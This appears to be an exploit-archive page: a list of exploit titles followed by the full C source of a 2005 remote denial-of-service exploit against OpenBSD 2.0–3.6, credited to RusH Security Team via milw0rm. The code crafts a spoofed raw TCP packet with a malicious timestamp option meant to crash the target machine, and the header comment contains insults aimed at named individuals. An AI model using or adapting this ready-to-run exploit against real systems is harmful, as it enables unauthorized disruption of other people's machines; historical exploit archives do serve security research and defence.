477bcbdcc0
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
149 lines
4.3 KiB
C
Executable file
149 lines
4.3 KiB
C
Executable file
#define _BSD_SOURCE
|
|
|
|
#include <stdio.h>
|
|
#include <ctype.h>
|
|
#include <sys/socket.h>
|
|
#include <netinet/in.h>
|
|
#include <netinet/in_systm.h>
|
|
#include <netinet/ip.h>
|
|
#include <netinet/tcp.h>
|
|
#include <sysexits.h>
|
|
#include <stdlib.h>
|
|
#include <unistd.h>
|
|
#include <sys/types.h>
|
|
/* edited by /str0ke ! milw0rm.com to compile under linux */
|
|
#ifndef TCPOPTLEN
|
|
#define TCPOPTLEN 12
|
|
#endif
|
|
#define UMASK 0xffff
|
|
#define TIMESTAMP 0x7b000000 // 123 in hex - change it, this will probably help
|
|
// ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.6/common/010_rtt.patch
|
|
|
|
/*
|
|
ANY MODIFIED REPUBLISHING IS RESTRICTED
|
|
OpenBSD 2.0 - 3.6 Remote DoS Exploit
|
|
Tested under OpenBSD 3.6 at OpenBSD 3.5/3.6
|
|
Vuln by OpenBSD errata, http://www.openbsd.org/errata.html
|
|
(c)oded by __blf 2005 RusH Security Team, http://rst.void.ru
|
|
Public version - change TimeStamp to cause System Crash
|
|
Gr33tz: zZz, Phoenix, MishaSt, Inck-Vizitor, BlackPrince
|
|
Fuck lamerz: Saint_I, nmalykh, Mr.Clumsy, RooD aka MapycyA
|
|
All rights reserved.
|
|
ANY MODIFIED REPUBLISHING IS RESTRICTED
|
|
*/
|
|
|
|
u_short checksum(unsigned short * addr, int len)
|
|
{
|
|
u_int32_t cksum = 0;
|
|
while(len > 0)
|
|
{
|
|
cksum += *addr++;
|
|
len -= 2;
|
|
}
|
|
if(len == 0)
|
|
{
|
|
cksum += *(u_char *)addr;
|
|
}
|
|
cksum = (cksum >> 16) + (cksum & UMASK);
|
|
cksum = cksum + (cksum >> 16);
|
|
return (~cksum);
|
|
}
|
|
|
|
int main(int argc, char ** argv)
|
|
{
|
|
struct in_addr src, dst;
|
|
struct sockaddr_in sin;
|
|
struct ip * iph;
|
|
struct tcphdr * tcph;
|
|
struct _pseudoheader {
|
|
struct in_addr src_addr;
|
|
struct in_addr dest_addr;
|
|
u_char zero;
|
|
u_char protocol;
|
|
u_short length;
|
|
} pseudoheader;
|
|
u_char * packet;
|
|
u_char * pseudopacket;
|
|
int mysock;
|
|
int on = 1;
|
|
u_char * ts; u_int32_t val = TIMESTAMP;
|
|
if( argc != 4)
|
|
{
|
|
fprintf(stderr, "r57obsd-dos.c by __blf\n");
|
|
fprintf(stderr, "RusH Security Team\n");
|
|
fprintf(stderr, "Usage: %s <source ip> <dest ip> <dest port>\n", argv[0]);
|
|
return EX_USAGE;
|
|
}
|
|
if ((packet = (char *)malloc(sizeof(struct ip) + sizeof(struct tcphdr) + TCPOPTLEN)) == NULL)
|
|
{
|
|
perror("malloc");
|
|
return EX_OSERR;
|
|
}
|
|
inet_aton(argv[1], &src);
|
|
inet_aton(argv[2], &dst);
|
|
iph = (struct ip *) packet;
|
|
iph->ip_v = IPVERSION;
|
|
iph->ip_hl = 5;
|
|
iph->ip_tos = 0;
|
|
iph->ip_len = ntohs(sizeof(struct ip) + sizeof(struct tcphdr) + TCPOPTLEN);
|
|
iph->ip_off = htons(IP_DF);
|
|
iph->ip_ttl = 255;
|
|
iph->ip_p = IPPROTO_TCP;
|
|
iph->ip_sum = 0;
|
|
iph->ip_src = src;
|
|
iph->ip_dst = dst;
|
|
tcph = (struct tcphdr *)(packet +sizeof(struct ip));
|
|
tcph->th_sport = htons(rand()); // just random
|
|
tcph->th_dport = htons(atoi(argv[3]));
|
|
tcph->th_seq = htonl(rand());
|
|
tcph->th_ack = htonl(rand());
|
|
tcph->th_off = 5 + (TCPOPTLEN >> 2);
|
|
tcph->th_flags = TH_ACK;
|
|
tcph->th_win = htons(512);
|
|
tcph->th_urp = 0;
|
|
ts = (unsigned char *)(packet + sizeof(struct ip) + sizeof(struct tcphdr));
|
|
ts[0] = ts[1] = 1;
|
|
ts[2] = 8;
|
|
ts[3] = 10;
|
|
memcpy(ts+4, &val, 4);
|
|
memset(ts+8, 0, 4);
|
|
pseudoheader.src_addr = src;
|
|
pseudoheader.dest_addr = dst;
|
|
pseudoheader.zero = 0;
|
|
pseudoheader.protocol = IPPROTO_TCP;
|
|
pseudoheader.length = htons(sizeof(struct tcphdr) + TCPOPTLEN);
|
|
if((pseudopacket = (char *)malloc(sizeof(pseudoheader)+sizeof(struct tcphdr) + TCPOPTLEN)) == NULL)
|
|
{
|
|
perror("malloc()");
|
|
return EX_OSERR;
|
|
}
|
|
memcpy(pseudopacket, &pseudoheader, sizeof(pseudoheader));
|
|
memcpy(pseudopacket + sizeof(pseudoheader), packet + sizeof(struct ip), sizeof(struct tcphdr) + TCPOPTLEN);
|
|
tcph->th_sum = checksum((unsigned short *)pseudopacket, sizeof(pseudoheader) + sizeof(struct tcphdr) + TCPOPTLEN);
|
|
mysock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW);
|
|
if(!mysock)
|
|
{
|
|
perror("socket!\n");
|
|
return EX_OSERR;
|
|
}
|
|
if(setsockopt(mysock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1)
|
|
{
|
|
perror("setsockopt");
|
|
shutdown(mysock, 2);
|
|
return EX_OSERR;
|
|
}
|
|
sin.sin_family = PF_INET;
|
|
sin.sin_addr = dst;
|
|
sin.sin_port = htons(atoi(argv[3])); // doesn't really matter
|
|
if(sendto(mysock, packet, sizeof(struct ip) + sizeof(struct tcphdr) + TCPOPTLEN, 0, (struct sockaddr *)&sin, sizeof(sin)) == -1)
|
|
{
|
|
perror("sendto()\n");
|
|
shutdown(mysock, 2);
|
|
return EX_NOHOST;
|
|
}
|
|
printf("Packet sent. Remote machine should crash.\n");
|
|
shutdown(mysock, 2);
|
|
return EX_OK;
|
|
}
|
|
|
|
// milw0rm.com [2005-03-09]
|